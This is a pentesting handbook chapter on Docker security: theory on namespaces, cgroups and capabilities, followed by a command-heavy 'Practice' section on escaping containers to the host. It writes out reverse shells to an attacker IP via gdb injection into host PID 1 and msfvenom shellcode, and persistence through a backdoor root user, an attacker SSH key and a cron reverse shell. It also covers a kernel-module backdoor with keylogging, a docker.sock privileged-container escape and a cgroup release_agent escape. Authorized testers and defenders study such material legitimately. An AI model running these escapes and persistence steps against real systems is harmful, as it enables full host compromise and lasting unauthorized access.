Docker

This chapter covers the basic theory behind Docker container security and how to escape from containers.

Theory

Docker containers are not a security technology by themselves, but rather a packaging and deployment mechanism that leverages existing Linux kernel security features. Docker security relies on three major mechanisms that provide process isolation and resource control: namespaces, cgroups, and capabilities.

Docker's security model assumes proper configuration of these mechanisms. Misconfigurations in any layer can lead to container escape and host compromise.

Namespaces: Process-Level Isolation

Namespaces are a Linux kernel feature that partitions kernel resources so that one set of processes sees one set of resources while another set of processes sees a different set of resources. Docker leverages six types of namespaces:

PID Namespace: Isolates process IDs. Processes in a container see only processes within the same container, with the main process appearing as PID 1.
Network Namespace: Isolates network interfaces, routing tables, and firewall rules. Each container gets its own network stack.
Mount Namespace: Isolates filesystem mount points. Containers see only their designated filesystem view.
User Namespace: Maps container user IDs to different host user IDs (not enabled by default in Docker).
UTS Namespace: Isolates hostname and domain name. Each container can have its own hostname.
IPC Namespace: Isolates inter-process communication resources like shared memory and semaphores.

Control Groups (`cgroups`): Resource Limitation and Monitoring

cgroups are a Linux kernel feature that limits and isolates resource usage (CPU, memory, disk I/O, network) of a collection of processes. Docker uses cgroups to:

CPU Control: Limit CPU usage and set scheduling priorities
Memory Control: Limit RAM usage and prevent memory bombs
Block I/O Control: Limit disk read/write operations
Network Control: Limit network bandwidth (with additional tools)
Device Control: Control access to devices like /dev/sda
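
As a minimal sketch of how such a limit looks from inside a container, the snippet below reads the memory limit of the current cgroup. The helper name `cgroup_mem_limit` and the default mount point `/sys/fs/cgroup` are assumptions made for illustration; the file names are those used by cgroup v2 (`memory.max`) and cgroup v1 (`memory.limit_in_bytes`).

```shell
#!/bin/sh
# Print the memory limit applied to the current cgroup.
# $1 is the cgroup mount root; /sys/fs/cgroup is an assumed default.
cgroup_mem_limit() {
    root=${1:-/sys/fs/cgroup}
    if [ -r "$root/memory.max" ]; then
        # cgroup v2: the file holds a byte count or the word "max"
        cat "$root/memory.max"
    elif [ -r "$root/memory/memory.limit_in_bytes" ]; then
        # cgroup v1: the file holds a byte count
        cat "$root/memory/memory.limit_in_bytes"
    else
        echo "unknown"
    fi
}

cgroup_mem_limit
```

In a container started with a memory limit (for example with `docker run --memory`), this should print that limit in bytes. A value of `max` on cgroup v2 means no limit is set.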

Capabilities: Privilege Control

Traditional Unix systems have a binary privilege model: root (UID 0) has all privileges, while non-root users have limited privileges. Linux capabilities break down root privileges into distinct units, allowing fine control over what privileged operations a process can perform.

Docker containers run with a restricted set of capabilities by default, dropping dangerous ones like:

CAP_SYS_ADMIN (system administration)
CAP_SYS_MODULE (kernel module loading)
CAP_SYS_PTRACE (process tracing)
CAP_NET_ADMIN (network administration tasks)

Some sensitive capabilities remain in Docker's default set:

CAP_DAC_OVERRIDE (bypass file read, write and execute permission checks)
CAP_SETUID, CAP_SETGID (change the process's own user and group IDs)

Practice

In a real-life engagement, we will need to perform a Docker container escape after obtaining a foothold in a running container. These escape techniques allow pivoting to the host running the container and thus gaining privileges.

Rapid Security Assessment

When landing on a host running Docker containers, the following command helps gather key information for privilege escalation (PrivEsc).

# Security check for running containers
docker ps -q | xargs docker inspect | jq '.[] | {
  Name: .Name,
  Privileged: .HostConfig.Privileged,
  Capabilities: .HostConfig.CapAdd,
  Mounts: [.Mounts[] | select(.Type=="bind") | .Source],
  PidMode: .HostConfig.PidMode,
  NetworkMode: .HostConfig.NetworkMode
}'

Capabilities Abuse

Docker drops many dangerous capabilities by default, but adding back a single high-risk capability can fully break isolation.

High-risk capabilities include:

CAP_SYS_ADMIN (most dangerous)
CAP_SYS_PTRACE
CAP_SYS_MODULE
CAP_DAC_OVERRIDE
CAP_NET_ADMIN
CAP_SETUID, CAP_SETGID

Privileged containers (--privileged) disable most security features, granting nearly all capabilities and device access. They provide multiple escape vectors.

Detection

# If capsh is available in the container
capsh --print
capsh --decode=$(grep CapEff /proc/self/status | awk '{print $2}')

# Manual way (requires capsh on the attack machine)
cat /proc/self/status | grep Cap
capsh --decode=<CapEff_value>

If CapEff is equal or close to 0000003fffffffff (all capability bits set; recent kernels define more capabilities, giving 000001ffffffffff), the container is effectively privileged.
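
When capsh is not available anywhere, the bitmask can also be checked by hand. The following is a small sketch, not a replacement for capsh: the helper name `risky_caps` is hypothetical, and it only tests the bits of the high-risk capabilities listed above, using the bit numbers from the kernel's capability definitions.

```shell
#!/bin/sh
# Print which high-risk capabilities are set in a capability bitmask.
# $1 is the hex value found on the CapEff line of /proc/<pid>/status.
risky_caps() {
    mask=$(printf '%d' "0x$1")
    # name:bit pairs, bit numbers as defined in linux/capability.h
    for entry in CAP_DAC_OVERRIDE:1 CAP_SETGID:6 CAP_SETUID:7 CAP_NET_ADMIN:12 \
                 CAP_SYS_MODULE:16 CAP_SYS_PTRACE:19 CAP_SYS_ADMIN:21; do
        name=${entry%%:*}
        bit=${entry##*:}
        if [ $(( (mask >> bit) & 1 )) -eq 1 ]; then
            echo "$name"
        fi
    done
}

# Check the current process when /proc is available
if [ -r /proc/self/status ]; then
    risky_caps "$(awk '/^CapEff/ {print $2}' /proc/self/status)"
fi
```

For the value commonly seen in a default Docker container, `00000000a80425fb`, this prints CAP_DAC_OVERRIDE, CAP_SETGID and CAP_SETUID. Seeing CAP_SYS_ADMIN, CAP_SYS_PTRACE or CAP_SYS_MODULE in the output means capabilities were added back.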

`CAP_SYS_ADMIN`

CAP_SYS_ADMIN allows mounting filesystems, creating namespaces, and many other administrative operations. In a Docker escape context, it can let you mount the host file system directly into the container, provided a host block device is reachable.

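Direct disk mount:

# Requires a host block device (e.g. /dev/sda1) to be exposed inside the container
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash

This is not guaranteed with CAP_SYS_ADMIN alone: the device node must exist in the container and access to it must be allowed.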

Mount namespace manipulation:

# Create a new mount namespace, then mount inside it
unshare -m
mount -t proc proc /proc
mount /dev/sda1 /mnt

Creating a new mount namespace is generally possible with CAP_SYS_ADMIN, but it does not equal a host escape by itself. It gives filesystem control inside the container, not on the host.

| Condition | Can mount host FS? |
| --- | --- |
| CAP_SYS_ADMIN only | Not guaranteed |
| CAP_SYS_ADMIN + privileged | Yes |
| CAP_SYS_ADMIN + /dev mount | Yes |
| CAP_SYS_ADMIN + docker.sock | Yes |
| CAP_SYS_ADMIN + correct Docker defaults | No |

`CAP_SYS_PTRACE`

Combined with --pid=host, CAP_SYS_PTRACE allows attaching to host processes and executing code in their context. The --pid=host flag makes the container share the host's PID namespace.

Host-level code execution (requires gdb):

echo 0 > /proc/sys/kernel/yama/ptrace_scope
gdb -p 1 -batch -ex "call system(\"/bin/bash\")"
gdb -p 1 -batch -ex "call system(\"bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1\")"

Process injection:

# Create payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f raw -o payload.bin

# Upload payload and injector to the container
# In the container, identify the process running as root in the host system to gain root access for a callback.
ps aux | grep root

# Inject the payload in the process
./injector <root-process-pid> payload.bin

# Open the listener on the attack machine (start it before injecting)
pwncat-cs -lp <attacker_port>

The injector I use:

gaffe23/linux-inject (GitHub): Tool for injecting a shared object into a Linux process

`CAP_SYS_MODULE`

CAP_SYS_MODULE allows loading arbitrary kernel modules. Because containers share the host kernel, this leads to immediate host compromise.

insmod backdoor.ko

The kernel module backdoor I use:

matheuspd/Linux-Kernel-Module-Backdoor-Demonstration (GitHub): A simple example of a Linux kernel module that implements a backdoor that can communicate with another computer, receive shell commands, and send the responses of those commands back, i.e., performs a reverse shell. In addition, it can take screenshots and read the user input (keylogger).

`CAP_DAC_OVERRIDE`

CAP_DAC_OVERRIDE bypasses file read, write and execute permission checks. It is only useful for an escape when the host file system is already mounted in the container.

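# Option 1: if the host root is mounted at /host, chroot into it
chroot /host /bin/bash

# Option 2: edit host files through the mount (paths below assume no chroot)
# Create backdoor user
echo "backdoor:x:0:0::/root:/bin/bash" >> /host/etc/passwd
echo "backdoor:\$6\$<salt>\$<hash>" >> /host/etc/shadow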

# Install SSH key
mkdir -p /host/root/.ssh
echo "ssh-rsa AAAAB3... attacker" >> /host/root/.ssh/authorized_keys

# Persistent access via cron
echo "* * * * * root bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1" >> /host/etc/crontab

Namespaces Abuse

If a container shares namespaces with the host or gains the ability to enter them, isolation collapses.

Dangerous namespace configurations:

--pid=host
--net=host
--ipc=host
Writable /proc, /sys
nsenter available

Detection

# Inside a container
ls -l /proc/1/ns

# Outside a container
docker inspect <container> | jq '.[0].HostConfig'

Look for:

PidMode: "host"
NetworkMode: "host"
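
From inside a container, the namespace links can also be compared against the inode numbers the kernel reserves for its initial namespaces (defined in include/linux/proc_ns.h). This is a rough sketch: the helper names `initial_ns_inode` and `ns_inode` are made up for this example, and the mount and network namespaces are left out because they have no fixed inode number.

```shell
#!/bin/sh
# Inode numbers reserved by the kernel for its initial namespaces.
initial_ns_inode() {
    case "$1" in
        ipc)  echo 4026531839 ;;
        uts)  echo 4026531838 ;;
        user) echo 4026531837 ;;
        pid)  echo 4026531836 ;;
        *)    return 1 ;;
    esac
}

# Extract the inode from a link target such as "pid:[4026531836]"
ns_inode() {
    printf '%s\n' "$1" | sed 's/^.*\[\([0-9]*\)\]$/\1/'
}

for ns in pid ipc uts user; do
    [ -L "/proc/self/ns/$ns" ] || continue
    inode=$(ns_inode "$(readlink "/proc/self/ns/$ns")")
    if [ "$inode" = "$(initial_ns_inode "$ns")" ]; then
        echo "$ns: initial namespace (shared with the host)"
    else
        echo "$ns: isolated"
    fi
done
```

A shared user namespace is expected when user namespace remapping is not enabled. A shared pid or ipc namespace points to --pid=host or --ipc=host. If Docker itself runs inside another container, "initial" refers to the namespaces of the underlying kernel, so the result needs to be read with that in mind.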

PID Namespace Escape (`--pid=host`)

With --pid=host, host processes are visible and targetable. Entering their namespaces with nsenter also requires CAP_SYS_ADMIN.

nsenter -t 1 -m -u -i -n -p /bin/bash

You are now inside the host namespaces.

`/proc` Abuse

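/proc exposes kernel and process internals. When PID 1 is the host's init process (for example with --pid=host) and the container has enough privileges to follow /proc/1/root, that link leads to the host's root file system.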

ls /proc/1/root
chroot /proc/1/root /bin/bash

This is one of the simplest real-world escapes.

Mount Namespace Abuse

Writable mount namespaces allow filesystem manipulation.

mount | grep "/"
mount -o remount,rw /

Docker Socket Namespace Escape

When the Docker socket is mounted into a container, the Docker Engine API is reachable from inside it. If the Docker CLI is available in the container, you can interact with other containers, start new ones, and so on.

# Search for docker.sock, could be somewhere else
ls -la /var/run/docker.sock

# Check if the Docker Engine API is reachable
docker ps
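
If the Docker CLI is missing, the API can still be queried over the socket with curl. The sketch below assumes curl is present in the container; the helper name `docker_api_version` is hypothetical, while `/version` is a standard Docker Engine API endpoint.

```shell
#!/bin/sh
# Query the Docker Engine API over the Unix socket without the Docker CLI.
# $1 is the socket path; /var/run/docker.sock is the usual default.
docker_api_version() {
    sock=${1:-/var/run/docker.sock}
    if [ ! -S "$sock" ]; then
        echo "no socket at $sock" >&2
        return 1
    fi
    # The host part of the URL is ignored when --unix-socket is used
    curl -s --unix-socket "$sock" http://localhost/version
}

docker_api_version || echo "Docker Engine API not reachable"
```

A JSON answer containing the engine version confirms that the socket is usable from inside the container.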

Spin a new container with a host bind mount and privileges:

docker run -it --privileged -v /:/mnt alpine chroot /mnt /bin/sh

This is one of the most common container escapes in the wild.

`cgroups` Abuse

Cgroups limit resources, but misconfigured cgroups can be abused to execute code on the host. This attack is independent of Docker and targets the Linux kernel directly.

Detection

mount | grep cgroup
ls /sys/fs/cgroup

Writable cgroup mounts are a red flag.
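
To spot writable cgroup mounts quickly, the mount table can be filtered by filesystem type and mount options. This is an illustrative sketch: the function name `writable_cgroup_mounts` is an assumption, and it simply reads the standard fields of /proc/mounts (device, mount point, type, options).

```shell
#!/bin/sh
# List cgroup mounts that are mounted read-write.
# $1 is the mount table to read; /proc/mounts is the assumed default.
writable_cgroup_mounts() {
    awk '($3 == "cgroup" || $3 == "cgroup2") && $4 ~ /(^|,)rw(,|$)/ {print $2, $3}' \
        "${1:-/proc/mounts}"
}

if [ -r /proc/mounts ]; then
    writable_cgroup_mounts
fi
```

Each output line gives the mount point and the cgroup version in use (`cgroup` for v1, `cgroup2` for v2). An empty result means every cgroup mount is read-only.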

cgroup `release_agent` Escape

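In cgroup v1, when the last process in a cgroup with notify_on_release enabled exits, the kernel runs the program named in release_agent as root on the host.

# Mount a cgroup v1 controller (requires CAP_SYS_ADMIN)
mkdir /tmp/cgrp
mount -t cgroup -o memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
# Ask the kernel to run the release agent when the child cgroup becomes empty
echo 1 > /tmp/cgrp/x/notify_on_release
# The release_agent path is resolved on the host, not inside the container
echo "/bin/bash" > /tmp/cgrp/release_agent
# The agent fires once the last process in the cgroup exits
echo $$ > /tmp/cgrp/x/cgroup.procs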

This results in host command execution.

Resources

Container Breakouts – Part 3: Docker Socket (Nody's blog)

Container Breakouts – Part 2: Privileged Container (Nody's blog)

Container Breakouts – Part 1: Access to root directory of the Host (Nody's blog)

https://redfoxsec.com/blog/exploiting-excessive-container-capabilities/ (redfoxsec.com)

2375, 2376 Pentesting Docker - HackTricks (book.hacktricks.wiki)

